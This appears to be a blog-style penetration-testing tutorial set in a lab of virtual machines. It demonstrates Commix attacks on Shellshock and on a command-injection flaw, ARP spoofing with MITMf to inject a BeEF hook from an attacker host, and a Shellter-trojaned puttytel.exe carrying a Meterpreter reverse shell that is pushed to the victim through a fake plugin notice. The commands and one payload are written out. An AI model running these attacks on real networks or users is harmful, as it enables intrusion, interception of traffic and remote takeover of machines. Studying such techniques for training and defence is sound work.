Command and Shell Code Injection Scenarios with Commix and Shellter
This virtual, but yet realistic scenario was created to demonstrate some exploitation techniques by using my favorite tools. We will exploit a web application command injection and a Shellshock vulnerability by using the Commix tool created by @ancst. Moreover, we will use beEF to exploit a web browser and Shellter Project by kyREcon which is the most advanced PE infector/Shellcode Injector ever created - yes, you probably haven't heard of it.
This article was written while enjoying a - cappuccino - coffee at Monastiraki, Athens. I tried to keep it as technical as possible while at the same time I tried to create a funny and educational story. Of course, nobody has harmed at Monastiraki during this article. Instead, several Virtual Machines were set up to substitute the cafe clients. At the end of this article, you will find available all of the configurations and scripts I used. Make sure to improve them!
FREE role-guided training plans
So, by firing up the three virtual machines that I had already set. I moved on with discovering their IPs.
By executing the following command, I was able to determine the IP of each Virtual Machine:
$ nmap -sn 192.168.1.0/24
As the first IP belongs to the router, let's start exploring the second host with IP 192.168.1.5.
No firewalls or IPS/IDS were set up so we can perform an Aggressive Nmap Scan.
$ sudo nmap -A 192.168.1.5
By accessing the web server we are redirected to: http://192.168.1.5/cgi-bin/notvulnerable.cgi
Which is our first thought when we find a CGI file available on a Web Server? That's correct, Shellshock! For its exploitation, I will be using the Commix tool that I mentioned previously. Commix, comes with a preloaded plugin which allows us to perform a Command Injection attack once we have found a Shellshock vulnerability.
Of course, we can first test manually if there is indeed a Shellshock vulnerability but we don't have to worry about this as Commix will let us know as well. For this specific Shellshock exploitation, Commix will be parsing the payloads through the User-Agent header.
The command I executed:
$ python commix.py --shellshock --url="http://192.168.1.5/cgi-bin/notvulnerable.cgi"
And here is the result:
As you can see, we are able to execute commands against the target system. Of course, Commix let us know about the payloads used to execute the command.
From Wireshark, we can also see how the request looks like. Please, have a look at the User-Agent header.
Let's now move to our second Virtual Machine Lab with IP 192.168.1.68. By performing a Port Scan, we find out that there is a Web Server available. When we browse it we see something like this:
Let's test it to see how it works. By entering /var/www/html as a Path, we get the following result:
Let's use Commix again to see if the Web Application is vulnerable to any code injection attacks. For the record, as you will see in the code of the application, I have blacklisted several characters to prevent Code Injection. What really caught my attention is that I have also blacklisted the "$" character but yet, Commix managed to exploit the application.
The command I used:
$ python commix.py --url="http://192.168.1.68/index.php?command=test"
And the result:
Once again, you are able to see the Payload used. In this case it was: " %0aecho VZYDSK>/var/www/html/VZYDSK.txt".
As we have seen Commix is a powerful Command Injection tool. There are many cases where you can use it, and it would be impossible to cover them all in one article. You can find more usage examples here.
Let's now move to our final target host, 192.168.1.109. From the Aggressive scan, we can guess that the target is a simple host with no special services running. We can also see that it is running a Windows 10 distribution.
Supposing that the host is used by an active user, I performed an ARP Spoof attack to see its activity. The commands I used were:
$ echo 1 > /proc/sys/net/ipv4/ip_forward
$ arpspoof -t 192.168.1.109 192.168.1.1 -i wlan0
And then I used Wireshark to view the Web Pages the user was browsing. Of course, could also find out the websites the victim is visiting with tools such as urlsnarf. After a while, I caught this request:
I saw HTTP requests for this website, www.4stoixeia.gr, multiple times and thus I decided to inject the user's browser with the BeEF hook script.
There are several ways this task can be achieved. For the simplicity of this article, I stopped the ARP Spoof attack that I previously initiated, and I used MITMf
to perform the MITM attack. Before executing MITMF, it's important to run the "beef-xss"
Back to MITMF, I also used the --js-url parameter to specify the script I would like to inject:
$ mitmf --spoof --arp --inject --target=192.168.1.109 --gateway=192.168.1.1 --js-url="http://192.168.1.111:3000/hook.js" -i eth1
Now that the MITM attack is going on, we have to wait for the victim to access any website. After a while, here is how my BeEF window looked like:
This is not enough, though. I wanted to get a reverse shell on the target machine. What I did was to choose the "Fake Notification Bar" plugin provided by BeEF which tells the victim to download some important plugins for his browser. The problem here was to find a good way to inject my shellcode. There might be a Firewall and an Antivirus Application on the target machine which I didn't want to alert.
After a lot of research, I found out that the stealthiest way to do this is by using a powerful tool called Shellter. Shellter provides a beautiful solution when we need to inject shellcode into Windows Applications. As I mentioned previously, it is the most advanced PE infector/Shellcode Injector ever created.
What I did first was to use the Meterpreter reverse_tcp payload and load it at the Metasploit handler which I then run.
Then I downloaded puttytel in which I would inject my shellcode with Shellter. Of course, you can use whatever program you want. This is just an example to show how to inject shellcodes with Shellter. Afterward, I used wine to run Shellter and configure my malicious file:
Here, I have used the Automatic Operation Mode. The PE Target is the location of the file we would like to insert our shellcode. For this example, it was puttytel.exe.
Here I also used the Stealth Mode. Moreover, I used the Meterpreter_Reverse_TCP payload and configured it accordingly. Our malicious file is now called "puttytel.exe." Shellter has saved the official file with name "puttytel.exe.bak."
Now that we have the malicious file with the payload injected, let's move back to BeEF and execute the Fake Notification plugin.
As you can see, we will force the victim to download the injected file. Here is what the victim's screen will look like after the plugin execution:
Supposing that the victim downloads and executes the "plugin" and thus, our injected program, we will see something like this:
What is really amazing is that the user will just see the program running normally:
Even with an AV-enabled, we managed to get a reverse shell.
As you have seen both Commix and Shellter are powerful tools that I truly suggest you to start using. Of course, you should ONLY use them for educational purposes. You should never use them to harm others/others property.
Here are the simple Vulnerable Applications I created for this article:
FREE role-guided training plans
Thanks for your time. I hope you enjoyed this article as much as I did!